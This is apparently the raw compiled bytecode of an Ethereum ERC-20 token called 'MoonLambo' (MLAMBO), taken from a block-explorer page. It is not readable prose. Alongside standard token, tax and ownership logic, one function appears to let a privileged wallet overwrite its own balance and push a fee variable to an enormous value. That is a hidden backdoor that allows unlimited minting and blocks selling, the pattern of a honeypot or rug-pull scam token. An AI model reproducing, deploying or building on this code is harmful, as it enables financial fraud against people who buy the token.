0201c565b601160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600960003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600960006200057462000cfd60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c60006200063362000cfd60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c6000601160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600d60006200071462000cfd60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600d60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600d6000601160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600d6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050505062001887565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000a02576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620009f990620016dd565b60405180910390fd5b62000a1e8160055462000d2660201b62000cd31790919060201c565b60058190555062000a7d81600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000d2660201b62000cd31790919060201c565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000b209190620016ff565b60405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160362000b9e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000b959062001792565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000c10576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000c07906200182a565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405162000cf09190620016ff565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000818362000d3691906200184c565b905092915050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b62000da78262000d5c565b810181811067ffffffffffffffff8211171562000dc95762000dc862000d6d565b5b80604052505050565b600062000dde62000d3e565b905062000dec828262000d9c565b919050565b600067ffffffffffffffff82111562000e0f5762000e0e62000d6d565b5b62000e1a8262000d5c565b9050602081019050919050565b60005b8381101562000e4757808201518184015260208101905062000e2a565b60008484015250505050565b600062000e6a62000e648462000df1565b62000dd2565b90508281526020810184848401111562000e895762000e8862000d57565b5b62000e9684828562000e27565b509392505050565b600082601f83011262000eb65762000eb562000d52565b5b815162000ec884826020860162000e53565b91505092915050565b6000819050919050565b62000ee68162000ed1565b811462000ef257600080fd5b50565b60008151905062000f068162000edb565b92915050565b60008060006060848603121562000f285762000f2762000d48565b5b600084015167ffffffffffffffff81111562000f495762000f4862000d4d565b5b62000f578682870162000e9e565b935050602084015167ffffffffffffffff81111562000f7b5762000f7a62000d4d565b5b62000f898682870162000e9e565b925050604062000f9c8682870162000ef5565b9150509250925092565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000ff957607f821691505b6020821081036200100f576200100e62000fb1565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620010797fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200103a565b6200108586836200103a565b95508019841693508086168417925050509392505050565b6000819050919050565b6000620010c8620010c2620010bc8462000ed1565b6200109d565b62000ed1565b9050919050565b6000819050919050565b620010e483620010a7565b620010fc620010f382620010cf565b84845462001047565b825550505050565b600090565b6200111362001104565b62001120818484620010d9565b505050565b5b8181101562001148576200113c60008262001109565b60018101905062001126565b5050565b601f8211156200119757620011618162001015565b6200116c846200102a565b810160208510156200117c578190505b620011946200118b856200102a565b83018262001125565b50505b505050565b600082821c905092915050565b6000620011bc600019846008026200119c565b1980831691505092915050565b6000620011d78383620011a9565b9150826002028217905092915050565b620011f28262000fa6565b67ffffffffffffffff8111156200120e576200120d62000d6d565b5b6200121a825462000fe0565b620012278282856200114c565b600060209050601f8311600181146200125f57600084156200124a578287015190505b620012568582620011c9565b865550620012c6565b601f1984166200126f8662001015565b60005b82811015620012995784890151825560018201915060208501945060208101905062001272565b86831015620012b95784890151620012b5601f891682620011a9565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200135c57808604811115620013345762001333620012ce565b5b6001851615620013445780820291505b80810290506200135485620012fd565b945062001314565b94509492505050565b6000826200137757600190506200144a565b816200138757600090506200144a565b8160018114620013a05760028114620013ab57620013e1565b60019150506200144a565b60ff841115620013c057620013bf620012ce565b5b8360020a915084821115620013da57620013d9620012ce565b5b506200144a565b5060208310610133831016604e8410600b84101617156200141b5782820a905083811115620014155762001414620012ce565b5b6200144a565b6200142a84848460016200130a565b92509050818404811115620014445762001443620012ce565b5b81810290505b9392505050565b600060ff82169050919050565b60006200146b8262000ed1565b9150620014788362001451565b9250620014a77fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462001365565b905092915050565b6000620014bc8262000ed1565b9150620014c98362000ed1565b9250828202620014d98162000ed1565b91508282048414831517620014f357620014f2620012ce565b5b5092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006200152782620014fa565b9050919050565b62001539816200151a565b81146200154557600080fd5b50565b60008151905062001559816200152e565b92915050565b60006020828403121562001578576200157762000d48565b5b6000620015888482850162001548565b91505092915050565b6200159c816200151a565b82525050565b6000604082019050620015b9600083018562001591565b620015c8602083018462001591565b9392505050565b620015da8162000ed1565b82525050565b6000604082019050620015f7600083018562001591565b620016066020830184620015cf565b9392505050565b60008115159050919050565b62001624816200160d565b81146200163057600080fd5b50565b600081519050620016448162001619565b92915050565b60006020828403121562001663576200166262000d48565b5b6000620016738482850162001633565b91505092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620016c5601f836200167c565b9150620016d2826200168d565b602082019050919050565b60006020820190508181036000830152620016f881620016b6565b9050919050565b6000602082019050620017166000830184620015cf565b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006200177a6024836200167c565b915062001787826200171c565b604082019050919050565b60006020820190508181036000830152620017ad816200176b565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000620018126022836200167c565b91506200181f82620017b4565b604082019050919050565b60006020820190508181036000830152620018458162001803565b9050919050565b6000620018598262000ed1565b9150620018668362000ed1565b9250828201905080821115620018815762001880620012ce565b5b92915050565b612be680620018976000396000f3fe6080604052600436106101395760003560e01c806370a08231116100ab578063a457c2d71161006f578063a457c2d714610413578063a5fea8af14610450578063a9059cbb1461048d578063d2156abe146104ca578063dd62ed3e146104f3578063f2fde38b1461053057610140565b806370a082311461033e578063715018a61461037b5780637d1db4a5146103925780638da5cb5b146103bd57806395d89b41146103e857610140565b8063313ce567116100fd578063313ce5671461023b578063395093511461026657806342966c68146102a357806349965e9f146102cc57806349bd5a5e146102f757806351c6590a1461032257610140565b8063061bbf6a1461014257806306fdde031461016b578063095ea7b31461019657806318160ddd146101d357806323b872dd146101fe57610140565b3661014057005b005b34801561014e57600080fd5b5061016960048036038101906101649190611dfe565b610559565b005b34801561017757600080fd5b5061018061058f565b60405161018d9190611ebb565b60405180910390f35b3480156101a257600080fd5b506101bd60048036038101906101b89190611f3b565b610621565b6040516101ca9190611f96565b60405180910390f35b3480156101df57600080fd5b506101e861063f565b6040516101f59190611fc0565b60405180910390f35b34801561020a57600080fd5b5061022560048036038101906102209190611fdb565b610649565b6040516102329190611f96565b60405180910390f35b34801561024757600080fd5b50610250610722565b60405161025d919061204a565b60405180910390f35b34801561027257600080fd5b5061028d60048036038101906102889190611f3b565b61072b565b60405161029a9190611f96565b60405180910390f35b3480156102af57600080fd5b506102ca60048036038101906102c59190611dfe565b6107de565b005b3480156102d857600080fd5b506102e16107f2565b6040516102ee9190612074565b60405180910390f35b34801561030357600080fd5b5061030c61080a565b6040516103199190612074565b60405180910390f35b61033c60048036038101906103379190611dfe565b610830565b005b34801561034a57600080fd5b506103656004803603810190610360919061208f565b61088d565b6040516103729190611fc0565b60405180910390f35b34801561038757600080fd5b506103906108d6565b005b34801561039e57600080fd5b506103a76108ea565b6040516103b49190611fc0565b60405180910390f35b3480156103c957600080fd5b506103d261091e565b6040516103df9190612074565b60405180910390f35b3480156103f457600080fd5b506103fd610947565b60405161040a9190611ebb565b60405180910390f35b34801561041f57600080fd5b5061043a60048036038101906104359190611f3b565b6109d9565b6040516104479190611f96565b60405180910390f35b34801561045c57600080fd5b5061047760048036038101906104729190611dfe565b610aa6565b6040516104849190611fc0565b60405180910390f35b34801561049957600080fd5b506104b460048036038101906104af9190611f3b565b610aff565b6040516104c19190611f96565b60405180910390f35b3480156104d657600080fd5b506104f160048036038101906104ec9190611dfe565b610b1d565b005b3480156104ff57600080fd5b5061051a600480360381019061051591906120bc565b610bc9565b6040516105279190611fc0565b60405180910390f35b34801561053c57600080fd5b506105576004803603810190610552919061208f565b610c50565b005b601154331461056757600080fd5b6040513381526003602082015260408120828155600a60648002606480020202600a55505050565b60606001805461059e9061212b565b80601f01602080910402602001604051908101604052809291908181526020018280546105ca9061212b565b80156106175780601f106105ec57610100808354040283529160200191610617565b820191906000526020600020905b8154815290600101906020018083116105fa57829003601f168201915b5050505050905090565b600061063561062e610ce9565b8484610cf1565b6001905092915050565b6000600554905090565b6000610656848484610eba565b61071784610662610ce9565b61071285604051806060016040528060288152602001612b6460289139600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006106c8610ce9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118249092919063ffffffff16565b610cf1565b600190509392505050565b60006012905090565b60006107d4610738610ce9565b846107cf8560046000610749610ce9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610cd390919063ffffffff16565b610cf1565b6001905092915050565b6107ef6107e9610ce9565b82611879565b50565b737a250d5630b4cf539739df2c5dacb4c659f2488d81565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b610838611a1c565b6001600760146101000a81548160ff02191690831515021790555061086561085e61091e565b3083610eba565b61086f8134611a9a565b6000600760146101000a81548160ff02191690831515021790555050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108de611a1c565b6108e86000611b7f565b565b6000610919633b9aca0061090b601054600554611c4390919063ffffffff16565b611c5990919063ffffffff16565b905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600280546109569061212b565b80601f01602080910402602001604051908101604052809291908181526020018280546109829061212b565b80156109cf5780601f106109a4576101008083540402835291602001916109cf565b820191906000526020600020905b8154815290600101906020018083116109b257829003601f168201915b5050505050905090565b6000610a9c6109e6610ce9565b84610a9785604051806060016040528060258152602001612b8c6025913960046000610a10610ce9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118249092919063ffffffff16565b610cf1565b6001905092915050565b6000610af8600554610aea633b9aca00610adc610ac1610722565b600a610acd91906122be565b87611c4390919063ffffffff16565b611c4390919063ffffffff16565b611c5990919063ffffffff16565b9050919050565b6000610b13610b0c610ce9565b8484610eba565b6001905092915050565b601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610bad576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ba490612355565b60405180910390fd5b6000600a819055506000600b81905550610bc681611c6f565b50565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610c58611a1c565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610cc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cbe906123e7565b60405180910390fd5b610cd081611b7f565b50565b60008183610ce19190612407565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d60576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d57906124ad565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610dcf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dc69061253f565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ead9190611fc0565b60405180910390a3505050565b610ec5838383611c87565b6000806000610ed261091e565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff1614158015610f405750610f1061091e565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b156114c157600c60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015610fe95750600c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156114c057600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff161480156110995750600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b80156110ef5750600d60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156111455750600d60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561124357611177633b9aca00611169601054600554611c4390919063ffffffff16565b611c5990919063ffffffff16565b8411156111b9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111b0906125d1565b60405180910390fd5b6111e6633b9aca006111d8600f54600554611c4390919063ffffffff16565b611c5990919063ffffffff16565b611201856111f38861088d565b610cd390919063ffffffff16565b1115611242576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161123990612663565b60405180910390fd5b5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156112cc57503073ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff1614155b15611370576112fc633b9aca006112ee600b5487611c4390919063ffffffff16565b611c5990919063ffffffff16565b9250611329633b9aca0061131b600a5487611c4390919063ffffffff16565b611c5990919063ffffffff16565b915043600860003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff1614801561141b5750600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b156114bf5761144b633b9aca0061143d600b5487611c4390919063ffffffff16565b611c5990919063ffffffff16565b9250611478633b9aca0061146a600a5487611c4390919063ffffffff16565b611c5990919063ffffffff16565b915043600860003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b5b6114d48284610cd390919063ffffffff16565b905060008111156116735760008311156114f3576114f28684611879565b5b600082111561165d576115708260036000601160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610cd390919063ffffffff16565b60036000601160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550601160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516116549190611fc0565b60405180910390a35b6116708185611dad90919063ffffffff16565b93505b6116df84604051806060016040528060268152602001612b3e60269139600360008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118249092919063ffffffff16565b600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061177484600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610cd390919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef866040516118149190611fc0565b60405180910390a3505050505050565b600083831115829061186c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118639190611ebb565b60405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036118e8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118df906126f5565b60405180910390fd5b61195481604051806060016040528060228152602001612b1c60229139600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118249092919063ffffffff16565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506119ac81600554611dad90919063ffffffff16565b600581905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611a109190611fc0565b60405180910390a35050565b611a24610ce9565b73ffffffffffffffffffffffffffffffffffffffff16611a4261091e565b73ffffffffffffffffffffffffffffffffffffffff1614611a98576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a8f90612761565b60405180910390fd5b565b611ac730600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610cf1565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080611b1361091e565b426040518863ffffffff1660e01b8152600401611b35969594939291906127c6565b60606040518083038185885af1158015611b53573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611b78919061283c565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008183611c51919061288f565b905092915050565b60008183611c679190612900565b905092915050565b6010548103611c7d57600080fd5b8060108190555050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611cf6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ced906129a3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611d65576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d5c90612a35565b60405180910390fd5b60008111611da8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d9f90612ac7565b60405180910390fd5b505050565b60008183611dbb9190612ae7565b905092915050565b600080fd5b6000819050919050565b611ddb81611dc8565b8114611de657600080fd5b50565b600081359050611df881611dd2565b92915050565b600060208284031215611e1457611e13611dc3565b5b6000611e2284828501611de9565b91505092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611e65578082015181840152602081019050611e4a565b60008484015250505050565b6000601f19601f8301169050919050565b6000611e8d82611e2b565b611e978185611e36565b9350611ea7818560208601611e47565b611eb081611e71565b840191505092915050565b60006020820190508181036000830152611ed58184611e82565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611f0882611edd565b9050919050565b611f1881611efd565b8114611f2357600080fd5b50565b600081359050611f3581611f0f565b92915050565b60008060408385031215611f5257611f51611dc3565b5b6000611f6085828601611f26565b9250506020611f7185828601611de9565b9150509250929050565b60008115159050919050565b611f9081611f7b565b82525050565b6000602082019050611fab6000830184611f87565b92915050565b611fba81611dc8565b82525050565b6000602082019050611fd56000830184611fb1565b92915050565b600080600060608486031215611ff457611ff3611dc3565b5b600061200286828701611f26565b935050602061201386828701611f26565b925050604061202486828701611de9565b9150509250925092565b600060ff82169050919050565b6120448161202e565b82525050565b600060208201905061205f600083018461203b565b92915050565b61206e81611efd565b82525050565b60006020820190506120896000830184612065565b92915050565b6000602082840312156120a5576120a4611dc3565b5b60006120b384828501611f26565b91505092915050565b600080604083850312156120d3576120d2611dc3565b5b60006120e185828601611f26565b92505060206120f285828601611f26565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061214357607f821691505b602082108103612156576121556120fc565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156121e2578086048111156121be576121bd61215c565b5b60018516156121cd5780820291505b80810290506121db8561218b565b94506121a2565b94509492505050565b6000826121fb57600190506122b7565b8161220957600090506122b7565b816001811461221f576002811461222957612258565b60019150506122b7565b60ff84111561223b5761223a61215c565b5b8360020a9150848211156122525761225161215c565b5b506122b7565b5060208310610133831016604e8410600b841016171561228d5782820a9050838111156122885761228761215c565b5b6122b7565b61229a8484846001612198565b925090508184048111156122b1576122b061215c565b5b81810290505b9392505050565b60006122c982611dc8565b91506122d48361202e565b92506123017fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846121eb565b905092915050565b7f4e6f7420616e206f776e65722100000000000000000000000000000000000000600082015250565b600061233f600d83611e36565b915061234a82612309565b602082019050919050565b6000602082019050818103600083015261236e81612332565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006123d1602683611e36565b91506123dc82612375565b604082019050919050565b60006020820190508181036000830152612400816123c4565b9050919050565b600061241282611dc8565b915061241d83611dc8565b92508282019050808211156124355761243461215c565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612497602483611e36565b91506124a28261243b565b604082019050919050565b600060208201905081810360008301526124c68161248a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000612529602283611e36565b9150612534826124cd565b604082019050919050565b600060208201905081810360008301526125588161251c565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b60006125bb602883611e36565b91506125c68261255f565b604082019050919050565b600060208201905081810360008301526125ea816125ae565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f60008201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b600061264d602383611e36565b9150612658826125f1565b604082019050919050565b6000602082019050818103600083015261267c81612640565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b60006126df602183611e36565b91506126ea82612683565b604082019050919050565b6000602082019050818103600083015261270e816126d2565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061274b602083611e36565b915061275682612715565b602082019050919050565b6000602082019050818103600083015261277a8161273e565b9050919050565b6000819050919050565b6000819050919050565b60006127b06127ab6127a684612781565b61278b565b611dc8565b9050919050565b6127c081612795565b82525050565b600060c0820190506127db6000830189612065565b6127e86020830188611fb1565b6127f560408301876127b7565b61280260608301866127b7565b61280f6080830185612065565b61281c60a0830184611fb1565b979650505050505050565b60008151905061283681611dd2565b92915050565b60008060006060848603121561285557612854611dc3565b5b600061286386828701612827565b935050602061287486828701612827565b925050604061288586828701612827565b9150509250925092565b600061289a82611dc8565b91506128a583611dc8565b92508282026128b381611dc8565b915082820484148315176128ca576128c961215c565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061290b82611dc8565b915061291683611dc8565b925082612926576129256128d1565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061298d602583611e36565b915061299882612931565b604082019050919050565b600060208201905081810360008301526129bc81612980565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612a1f602383611e36565b9150612a2a826129c3565b604082019050919050565b60006020820190508181036000830152612a4e81612a12565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612ab1602983611e36565b9150612abc82612a55565b604082019050919050565b60006020820190508181036000830152612ae081612aa4565b9050919050565b6000612af282611dc8565b9150612afd83611dc8565b9250828203905081811115612b1557612b1461215c565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212202e44f843ca6c850b7125de38b17466395a3940ed648c51c5b87b78c8201d266764736f6c63430008110033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000174876e80000000000000000000000000000000000000000000000000000000000000000094d6f6f6e4c616d626f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064d4c414d424f0000000000000000000000000000000000000000000000000000

Deployed Bytecode

